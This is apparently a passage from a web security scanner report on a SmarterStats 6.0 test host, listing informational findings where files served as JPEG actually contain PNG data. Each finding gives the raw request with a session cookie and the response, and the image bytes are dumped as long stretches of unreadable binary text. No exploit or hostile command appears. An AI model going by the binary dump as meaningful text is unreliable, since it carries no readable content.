.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.50. http://vulnerable.smarterstats.6.0.host:9999/Temp/cc02654a98df41d6bd5a3edd66c42234.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/cc02654a98df41d6bd5a3edd66c42234.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/cc02654a98df41d6bd5a3edd66c42234.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 8761
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..!.IDATx^.].......bcc...1`.ec..\.[.s.f...........c..7....a!.+$..]qH..V+.....0...?.....W35.3.=..S]....Q......*...#........A.`..V...... .(!"1.A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@.....!"..A@.(..!...@...............F....Zf.....M.6.l}8.^......A...JAD.0........jp....;. -_S~....^...TA@. .JAD.-.%.    U....$_ .h.e...w..A@.(.....".C>:..t.bH..p.DMGW...&...W../.ellL}...R.....6..._...\D...".A*.n...s.Hw..".A.(...(........!...(...!.n....f....m.,I>.qBD.(......!.,D..U.H.c.[.D.FD..E..iL..t......Q.+..{.N...BD}l.{.~.5k....i......."]6.i.$.n.....MZM!:u.:...Y...g.........BD.`(..S........y;u..1+..>C.....q.-&X...<.....YMBD..L.(D..Qg..RM.|.BD..$D..Qg!"6..IBD..L.(D..Qg.D...>S..pBj.C@.f}`."b......:D.}.....u......!"!"...-..S...O"z...."r.8...@.WG.N...>..._.B-.m7..HD$...P..
..C..'.-=.4.x.}X.#D$D.2...Bt..u.ID........2.!"!"...-..S...o"z...X.#D$D.2...Bt..u.ID.1."r.92X..Df.!:u.:."..|...1{...X. ..DD,C.[(D..Qg_D..|.....Od.......P..
..C....}:9..h..3X.#D$D.2...Bt..u.ED....D.v.<....    ...%o...:D.}...O=..h...Y.#D$D.2...Bt..u.ED..Y..h...Y.#D$D.2...Bt..u.ED...Tw.........{.(.....C....!.....j.UW..@""..X...P.N.....h..+.....6\y%.t....X...P.N......    ..P............U...!.....?.H.......q..DD.....e......3..\.vS.sp....`..#2.G.8",".8.U..:.4.u..
.j..}.$...c0.....rj    ..C..WDt.N;...:Jm..rN..q..6.p..O...=.-!".9.
..C....a........5C$3\......h7...V.c....$c.....>.\I.N...>..$...... ...;U.......^M..I.....60..[zU.....6^{-..T.......h.'......t.X._......u......u.^...uEB.)3.....)...f.....#2.u2~...BI)D..Qg.D45:.#...^.6_=..J..M..S..)...X..<...T..g3..Y...d..eCN.Bt..u.AD&.~..k.f...\. "...2..z3R.r7..!".N..Bt..u.ADHxED.....o..e....M.....</!.<...;D..Qg.D......]wU[..Nm..oXF.(...m`!!..!dW..S....".......h...Y6 D..&!".9.
..C............4u....X.!D$D.2...Bt..u.AD.....5.}....LG.H..e(y....!............4k......#]..1....S...."ZD.....k".~.-,...H""...-..S....".....y?C..o...Y.#D$D.2...Bt..u............NP3......Y.#D$D.2...Bt..u...L......D..id.........!..7....5t...m....Ho|...H""...-..S..s.D......}8...+...........!..7......q.6........&!D........!..7....ABBD..C.....jBt..u....y...wT3.i>.......2F..$!".9.
..C.9o"ZFI..v.E.\v..BD..C.....*Bt..u....y.w....    .l.....2k68P.j...C.9o"B..}{....6.(.$.~p...hp..5...!..7.=L+..R...K..e.o.2.YG$...P..
..C.9o"B.....$D..a$"r.f..Bt..u........=.0....u.&;4..DBD.c..!D..Q......_9.H!"..s...8(..    ..C.9O"2    .+.>Zm.."].....;.....rk...C.9O".....3{...C'":&h.}p"@.>|..s.....vwq....'Xwbh2..i..-.k.....f.].Y3...S^.D.bj....F.GKG.m..\"".9.
..C.9....5..Yg.i:...._..e.%!".    u.%.......>..hh...0.o.{.#..X6.D(D..Q.<..d.o...P...r.....QR...R7.P_NQ...w.....>.......@l ...../j..;.i......_..P.$"J ".J.....h...l    'I^""...&.bt...yFD+h...v....>........._...D...%.....%7...:D..$"$......F..Y.......4...z#"
...f....k.n............:D..$.'.=W.G..s...Z..}..:..d........s##Xw...^.._M...*...7.*Y...rCf.^.9.|/.5...h.!:u.:...........Q7..7)=s..%......N.....C.Q..?.U>.5k..E.i.h.)n..?.q.$!"78rj    ..C.9......~..".(28.......3,.....v    ..C.9/"2    ...~..|.y.....q..........s&..F9e....K.N...y..Ix}.... ..........^.8..k...C....9.n.!.6.&....NR.h.....].j..#".3....._....!.......u..Z..u'...M...a.x.....yu...!.......I...t.9....kY..1"2[vD.R....wJ.<K......5@.N...y..NxE.k......hnE>I.&D$D...!.6::..;.Q..>..l.....e..Xu./$D..    Ct..u.+".    ....6.k.)[...eD........un....dB "....).._...ZH.nc...%{.....5v.O..a.h.,.g..,.....%.?_}U.z......$.u.k$.>...j..gv..|#".]..@D..h.S^...........@NH.C.T.K.._k..m.....D..5.....q.|..h..g....9F...N.....>..r........>....6\Hx}...{|e...X.f.#.......t}7b....5A.Ho.....{......8........X......X.(...DDg4.+/...h..e..P..Nq.k.2. X7.k%....=.2s..,|%".....6....;..0XW.K.._+...?.....UG.%D...i":.........(...8G..._.`...$..M....2s......(-"b...4V...+o...z.B..y..Y.`.....MP..3.Uh...^.....}Oa.Q..8......X...#.G..'3._.j.7...Q.    ..... ..a...(z].8.?;...X#....BD9...h..SXe=.8........9../X7.^v..zM]..l..2V..,".!..9jIg.E...s..D...(..+L...9../X7.....%..q....w..Q.i. ..v..,.9.5".t/..f.:":.dvy..Cu.........'.s..^.n`..&t...^.|e......$....zOp....^...z.!.,{.....%..O<Q....E].......X/..O.....\ "c<.....VC]....SS...D"...)..d..u..u.s.C^.n`.<..~..X?.r.%..)IDT."....'..bCB.}.....m[.^."I......a.q..........5...S.e.V..a........|.]#.\.`..3{.r...dNDD..5FO...G..s.i...c.M.....m... ..+......`..3...8?.r....)u...F7.p.R......^.....{..F,+.=...:*.../X..RH..%......yfk...9DD|#....._<.$.h..gl.j...D.....8.?...v..:..4.O...#...M....!...mI.....o...}_............$?..D...4..|..8........`_...m.).u#...q%..4.c\.1"F.y. D.F3    ........u##X+...........Tl-...;.s............`......vK..../d5.DD}`.....=....g.L..e.N...F....g...."r`j...=6s.k&.....s8hxf.....M<....>2=>.M..R".DDY....z!m..m.|]......j ...Y:.5.G....#".D&...........BD...Y.`....K....#..\.BS"...h@"z.9{..=...dP!q.A..._u..yf.P.....n.%uDD+F.-.w.U-...>.......<.U....""ZIc.I>2=o..a..."".D....E.ao....;G..F..:....i.^K    .BD9Z."..tz...4..F.as.<#..;G...Su..6.......>.Y"..M.%......"..vp.k_..;.......Xc.-.s........%5..y..2F.S.M.h.oM'..........]E.....Iyf.|d......1..1..G..\..i..'........ffX.....sp0r%Su...T.<.~.....Xp...@D..^.iO,x.Q..
uqU.9\`....X#.c    ..    .q-&....Q..gYC3jH.....nZ..#cSg...X.f.R.Y?..|..,l%"J..r&"4.2Z..1#l25.Uu...?....52....`!"... ...C...QF...b.c..#C3g...X#e    .......l:.......DD>H..X~...a.FGY.$Te.....7W.kL..^_...~>"D....o...m........s8hr.*...YU.&-G.....>...DDi..G"zl..........x.BU....^GI.BD..*.*..Q.....y.. ..U.9r6..........}..R}c.Yg......D.q..)....p.u..+.=.D..}].|..:.-.Ue...Y......4u?B.fi..9@Dtv......1....#...'<B..BO.e..;..).$.Ue...Y............1.76.y&...GDt..p].....1....q,...A ..$.4....,...1.Fd]i]e.`Y.C.*c.-b..1.4....tT.....R7..........Q.....]2S..v......5.<...."....f.m....i1c..O.~:......T.j...1^.h'z..N.|...R0>.X...w.q.*.Y..P..X....hr%.76.q.....Q...h....u...l...."!.........,kw,TU....;..(.76.NDz6.5M.......`.}3Q..)5..m.3X..E(..3..F......:.c.aUWU......9~.1....B..}..@8..[.....r..]V.9Q .,.....,.p,TU.q..........U..
.k.y..z.5v.y..2.....Zf...4..^..Z..:.5P.n.*.8....wg...&"...cV6:0..*4...\@....O.^Uu.[.\.W.k.u?J.L8~...SYP........&".N.(..:..b.YZ...ASg...X.d..4|........V...LE....=.mO...s.,=..*b...0l...9."......D...(k.    ...6V.9<.C.c.....W......Ol<.dV.HD....@B......1CasU.9l.q)[E.1P.0...D...R.BD.>._Tyh.].rzl.*:.>.e..5...-...{.}b...8.DD).QQ$......6..U.98F..L....6..*.............%]TY.......z.U5.....\...>YXQm..BD.,.h"B...q.&...spq.C....D^..&.......|0..d...d.Oy.BD.7.]...h[."..:f...q..F..?/....[........M..>LYR...Eo....h.....N:.e22F.6FT0.=MK.m.`....Rr.
Q.<u..f.>....?h.3........s,t..7.n.,z...7i.@.(gg..^GD.......{[%.f12...>.D....8=Hg.?b. ..DN...^Y..2.;.ht[_.:.D.....DD....Y&.$....P?...,%g....CgCB.S..m.g{/7..Y32..Ul.F....<J..l}aR.(S.u....=.C..^J..n.okd.......v..!..........=H....a.......D...J]D[_.dFn...ED.....i:-.;Ndkd.F..|.z.....`.oS.....{.....n.Q.7u...1.....x....e*..h...YOdkd.`rRE.z..y.-........p..i.*..O''...Fot.0h.(.......<.x.n...ED.......]Odcd,..$....t~.O.d.0u.l..v.H..m7Mi..YM....~.."r.@...Qc...G....3.#s...*B.{P..P.$.....66.\.a...F.'.=W..e.o.q..lD"...h...e(/6.-..12..x..To.....V....<......sfy.At6$....j_#.K..O.M..z.S.........c.eA+D....m.'J...kd,.H.B.6fRV.q.z....Go..l7p..:.. fl.....
....DF.    ......lH..........t>..9.Wo..a@...UO!"N.......fY.r/-p.#e[.........m....7.r..o,..CL..ZM-..2.>x>.IF....v....
...Q.{..!.R..^..zHm[....XY[......OIE$............>b......p.s.]......<`).;....9...DDi..Cc..Aq..f.l..7'j=.b.6.........3.^.F/.\.fR..m.7..%...".+........R.^+....g..X.bZ.t;}E.=w.9.M...u....}.....~=.`A@.R.~<..4z....>D.R....i...)../...ST.W_........ iD..I...0....'............ .....o.h.u.Z.P......Q.Y'...'.#"8[.
.....S.0....,.f.....G.....r".w`..8.$....GI_......Q.qv..g..U".{..9..'...V'.?t[A..{....A...6.o.p...    ....^h'....L..md.^.:A/...1.....w$UGs..-.{t4d..q.BDq..q.,N.m...@Ze$.q2 CF......A....N.]VQ.2.Q.......!.DU.....o..;...dW..Z.....i.m.61.....2.M.(.}^..........w.t......7...\.,D.C........t..- .    j.2.w..^%#z.....UU'..(..C...C.....?.....M.=@...]@..
...}..}4..].1........Q..x...\...Q..LQ...u.q."bDD*.........!.]...{...b..m.........,]3..%....x..w.:.6..w..f.c.zB....V.^.:8..Qg....!.\V..ED.
6.....(,...@..(.v....9.....n^y9A .....h'.R..............@."D.t...h.    .H5Jt.uo............~..F2.UL......x]i:..k.    ....b.k...7...o..<.E....0..tK..y.
...;b,f....n.>..D.....ERC.2..S.........~sMD.9q-
.....%.).R......4AW.....I....."...S.#..1,...W..Dd..p.hD..-...j...+.l.:.O....d.u.^.FD.z....V..k<..E.E...j.:...n....W..GD1..2.]."2o.........5Y....=...&j....S"....H...j.:.f...F.vW2.k.7""B.a........>5"*H..{...(..:VZ...EI%......t..I..H.;..9... ..-J....<...B....u.X.&).v.9@D...F.Dr.1...Vdl...%"..E.............7.(jx.#...C...e..D...J..o.....v.~Qi.o^..#y.?..z."....Q*    5.....i.h..0...............z.E..Muu.;...Z.E.8.9..q.............8V.7..=..o*U..Y.t.P..Y..R.k3..9.t..D.];:}........t.I.J.K%.....4#"j.......:..6..c.ic..w...y...Q...... P......
.. Pq...*n....@..."*C+...@...".......e@@.... :...G@.... ./....!.2... .T..!...... P......
.. Pq...*n....@..."*C+...@...".......e@...w..A=.......IEND.B`.

10.51. http://vulnerable.smarterstats.6.0.host:9999/Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/d31a05bc3d6e479fa7f64287243f64e6.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:18 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BE11F5300"
Content-Type: image/jpeg
Content-Length: 8473
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d.. .IDATx^.].......5.F..A1>0Qs#*o.<D...!...E8.S." ..7.../....|.C .9..8..BV....fy...w....P.w..L.L.......s.^..2gO............\@.......N..........B. ..@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@.B....@ u. D.w....@ .B.%
.&..T,.BW`.t.r.6...............|[.....5.D......hE.U.Q.<{..# ....R."/xD....+o...[.s.8....D [BD.N...<U.T%D.-/..j!...[kkk.8r..,G....~.-
0@.h......,......Y.....$F.^$.6^..MX.w...!.#B...d.f."...U#...P2.*...Q.........;...yH.B..    .z.f...$.;.%5....-_yt_|..>5#.q......G......!R.... ......*...Q=(.
..#{u.U..!RAK.mV    .i.|...f.a!r...J.....l!R.../..C......a!..s./A.b.....J.N..;.%5......H-htX..:PT.#..C. D.....Y%..i.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(..@. Dj....d...b5Y..B.!R.e=.Y%..u.......B..1..AfM@*V.U.!D.".P.c.UBpZ..9(    ...C,.7.e.!....E.....Q^}&q...F.`.wY.A. D.@.md......I.W..%.^p..~.....(..L....#D.v?!.....?..B.
..F."....3........w.....u.B./.B.n.7...J....
....BW..a..U....XY42.X:.o....|.E..7......2n\...>.p...
........    ..TNxt.XmWA......}......K:.@f.h..2.;MTO.}?...B.
P...(...hAr3!..0!r..+.J...PNTgA.o...>.C.B....F&    ..qdD,8....[>1{.. .}L!
...;....[~.:B$3....$J..#H......B..    #F."#0......._.B...&VCc
..nE.:B$.....|QP.."D....2!.P........8v....%..c.@|!.f)4....q. ....fUm    .|.L.C3V..jd..9.F..hTOv..B...3...EL!*....\y..."`N..G.B$...'....s@.Ii.~iB;....0G....F .V8.......w.....e..S..D.........f.w...=.............)B$.n......cK.s...3.$.....B!t]..uL#dDL.4.....T......,......^..!X!ly....S...$.&....mY.|.F....Zs..|ff.qc....w.s...LX.|.n.!..id. s$D.......=.....(..R..Bd.zS.H.e.=..9;F.I;..MgfD....Xu[c.!2.U .y.M.+i...=.$-D.-..C2w.....P.....m..I..)../.-.|..#D.Y.........zg.5cF...w.)B$.2...*.!j..p......W.(C.n8.v9}....>...cn*.s..-.....=..f.A,.>...D..Jh[.6E..b.......U....'....jJ......C.X.d.....N0A..Z...#....R.6..,vt.fuCl!......b......<. .y.Mes.>.-...../...S.......#[    m.....T.....g.r.........."V...!#2.U&..T..{}di......$D{:_fuCL!r6.2.c...Y.&b.!J.......17...>... v].-.\..jhL!r..vf5..D. D...X9..<.....w<...#D...K.....".z-o.`.....(1hC+..........&...;.!.y.......6.6.......y.M    ..g..~........Y..90A.X....B..Nve&p.5D..P. !..b.o."..+Pt.. .n....{8.....3.....!Z........(..@f....K.ww...OG...f.w.....g Dl.t.&M...V.....u.w,?6....<5...$.P..VR....    ...'i..w.V.3{..........F..y.%..r...d....n.4!.l.|.G..g......Mw..UVW48G...e,...A...-o.2......>.m..9B4...WXmP..'5.v.Z52."V.h5..i..]Y...>.a../.vN.e..D..2!.N...    .&.XI.n..&...07.;.3....#B.....%    ........Bd.s.BD.3{|....M.e.e#{......;...'...<.&.h.....]w.-..Q.y.B....
.+....
!R.../@...0V.I.N....{.#BSd....,?....+.    C.B....FI.B..U...pt...F<...bs.dY.]N.<.${.p.."..;....c........\........14....D.........t.$......O..M..d.{9..b+p.......7|0....D.....-......u42......$    .tk.{0...zJfDK~.$6}..,{.4...    .......V..u.D..a.`.D.f.U?...B....F .V8..%.....R.V..#.rD...3BT|.P`F.~j.fB..U.z.......f.k..I."i..{0..>.._.uDh.,{....;.......8S..Q=|!...;...^.......Vy2.[(.P..b ~...h.........b......02+D^.04ct.f.d...eV.$..?Y-.-.....ry.O..`./D..U....b.v,3[........}fM._..........Q.1~....f....MJ{.@R.....D#./..I..]g../.7A.Y............_.T.....u..f...."IB....>...0.3{j....=U../..#*eD.&.....Pp.... D.c.2..8..I.(.3....4...T....5>..<.+..!......QA......W.{0\..l..?...._.-.........>..|.9"....!#J.......1.;&...>......q..r..VC...w>..9....c!D.X.j..!.:.R.|....g6...b..q..r...%;Gd"...."SHW..2..<...}...cC..z.\Z..f5TKF$W:{..FF..^.......$..% "*I
w.}f+[G8"4.\Z..b5K..U..8T......4J*..t+....!
..._.-.w.9..X...[v.."....V.dD.<.f`+.m..B.......E.s..    _.u.yV.7......;.Y>.7.9":K......_.[.;.Q+..zW......sC[    m......\W.+.,.6-!.P%.6$D...\{....n1..~....G...k....]...V.!D........I..........213..wT..G..........%....s.........VB..7.(8....!.n...;    .Q..}G..Go...:.T..PQf....9.pg[    m............5...lF.:.}^....1.........Q.."[    m....`!.y.i..S....f.~.c....u....3Q.bF.-DnVt......R.....o.Qmt.......i    .9...X....%!Z.1:...>.9..j.d-+.....o.Qm...;..y..C./.`Q....u.....h..L.w..].Yy.o+.m..BTKg.5B..{..C./Lg..B..DB..."NY..`9iM+I.p.Jh[....F...c...5..fL....U.....c....[.,.&3.3[    m....Z!r.w.:.h..uNc.^7.....%t@#..:.(#z...v..v_9<...3[    m....Z...w\.......(.A...|..Q...G.k.(%M......!..xz{.....)D.k.....V%    ..s.*.....H......!..xz.<j].@.l...........{&.m...
...?..c..l%..~C.j#~.......!CB.6...2...5)..../.gt2]......o.Qm....I.......),z4.....y...W*+....-.Rl:. ...Jh[.....;. ?.....1&D......^U.....7..A..l%..~C......c....)D..?.z..s|)N.=...h..a.e./...._.v15-.....!..:.>q...~......Y.hph..}...,?R5.+DKZ...........V.!D.Pw..1....."..........k{....hh........;..VB..7....t..eD..x$.?.;'...`F...+:...6..OB....Xe..;dG..    .VB..7...+...e_
....g.    ..6.6jD...=(....wSi.....o..?....a?..".Y !Z~vp.2xy/A...q.Jh[......v..]ym(w.....E....]f....._...m%...v..y..x..a..."........].U.il......!.3..w.\wC(w..&Q!*........(i}..wR...oR<l.<...jH.....].|t.....<.R.F...V.!D.....On.%.;.ox#...Q...$.>.    ;T?..........,....y...B40vYzz.<...wyG..E!.{...V.!D.(..IL.{[(w..<.
w;.....n.U-8rx..ia......!j...uk*g..Jh[....Y$.w|pg(w6v+!..O...{.H#B...*..u.kg..FJ.........H....{.|}.].................p?.?a]nQH..
S....3..F.....z.......V...U..]U....B.....Xt.94c.....w...5.d.g.[..!.QV......~.#......Nn.....!...]U......!.....{6..z|........._>$.......6c..m%..~C.*Bt..6..[.7....JH...X-i..2.%...(s>.....f.q.....o.Q.h..,.....z.Y.!.+SQ...VH...H......mLl/.....o.Q.W.\.i.uuy...D'..$....h.W........6. ..
u...W.e+.m..BT.^z03:c]..?.$+.14s`JJ.\q......[....G.
.s.f+.m..BT........B..Z.QQ..L.....b..k....k..l%..~C.*..,.;......c.....Q)#Z....2...23........l%..~C...I.o...8xg]....EQ..w...}.3ce....N..u..d......o.Q1..........S.7..?..qdD..h.W.&L........
..0..I..l%..~C.....f|..O.......b.BT...:..+O..I.&Y[    m............8...1."..%!Z....2.....1k+.m..BTd.e.CV....Z..W......~.x...jA'.5r.Jh[........C........dDl~...~.e.......-3.e+.m..BT....{..;{Grfm.c....Qih..#D...O...3...{.Jh[...    ..)....'.3k D|jSF....R)..^%.M.q/[    m..................FFT..^9...Fy|.r.G..VB..7.H.....N.......X.!*....P..........8.....o.....-pN.......#Ya!*    Q.#Bi.y......l.8.....o...gm..p../o@....9.....V.Si's..VB..wO."z.(=.......7:xg.##*gD.    ......._.vQY.l%..~.t!r...~.6..2[#.@.../..V...N)D.l^.........h.'..C.^!.~q7./..=.
idD..h...8..W.....UD...V.{.....Mo^....sM."..%!...P.e...dVD...\...V.M...-L.!...q5..;?D...
.H..hh6...S-.....    ...R.H...~..":.........W....5....NG........
.H... D$...}O,.7A.s!_mm.e..I..e.....O.....H...v.....4r5.;.....*..QLC..z..../.J.<.r...E....D.Mm.;I!.a.-. .y....Kmw.b....v.....#..$.......+...s.Y.b..4G..)..S.................l.;)!.c.....\)f~.'4.i.....Y.....;~+c.bT.'.....".QI..:".vy..G...W*.!k+.m...2.1.N_ q...j1.X..q8......+gus.    ....|......."..K#...=..L.Q..VY.,>:.X...N!"!..nR...f/...D(:.......Z..z....5....of..m...CY."#*    .K...Y(...V...    ,Vd$ld......V.W........{..^'.(.7...../..r.}..\qv.+. D...9B...;.W.....s.    ,N.I.....!...$".,.RL=tK......R..n..4DS..}[.._..sE;...%.....73e.......Y..b.....~7"D..tF9eA...........<DS..........Wl?...fER....
9...$K..U...    ..O(....m....X...4....BD....<...x..........Z.!.
........Ol{..u.D.)/.$..D!......(.v{........]...C%...L..l.;........*1.w?..g.....-..=D..N...c......wY...X .n..Q6.....].LQ.n.T...-..h..G..h....o>..O..{.....-D..m.P..8$.(......b..    b.G...^}.#......G..W.?Glp.......?.^......-.Y"fm.&&m......;...h....V4_B...e. ...z.....].......N.I$...*..h...H.b...Q.=.i.h~{..<l_...x[.7f.u...} ...@[^4...Q..E!"a.p...#

zrAD.Eo..#m...].u:>7..+.:(#...j1t....3.o.V#W8C.......77L.......Q.}..^r...(^h.......1E...AM.J.........w..h.q..y.b.B...*..Qiii..6mB.....1.._......gh.B+.F$.6^..MX.w...-...o..M...OV.;vL?..j..w[..n.....{
.=+Sx|..V.....
..V.T@.-....".!J......................p....n&D.....A.K...7..s..tM>}...F.........Ym.........].aA6...=pob)..X*...k)..7...f...f.w...H.(.=.A..'g.Z........\>/......g.Z.Wp.V....Y.B../..E&.%ojq./..hS..A?,.>..W..?...e<N<......[...U.=..&B..".)....w...W7..~.K.Xp...O.=..,8.....Xw......|J..`..{....7NB....Y
....8.'D.?.Y...    ...:B......o%U......j.JT.J...Qu
.&JY.....~.jV.....X;.!N...nF....8.....&$....R....n..E..o.u...OT..V..J.B.2..D.H.=U2:.G.)2.o.B..vT..kp..g."e(N..D.#o.ds.y....g~+-.{TF.!B.9..Ib.(....h    dD....I.s2Y......fYlGi..;.....e......_.......v....(R....5.~n.z.#J.i..4DK"#.M....U..%=....9.....YjG...    . 2;.r.q...b`].......*...}.).Q......fasJ._.6...?..."...........K.~.....v...ib..c9[2.'..Y.X..y..........I>>..@ ..@...C...... D=...D .u. DY.!...z.......h"..:.........=...Q..d4..d...Q.{..........t2.......(.=...@.@.B..:.M..YG.B....@.. .!....&...#..,#t.Xy......IEND.B`.

10.52. http://vulnerable.smarterstats.6.0.host:9999/Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/dd92df2132484a6aa26dbcaa91ff4156.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

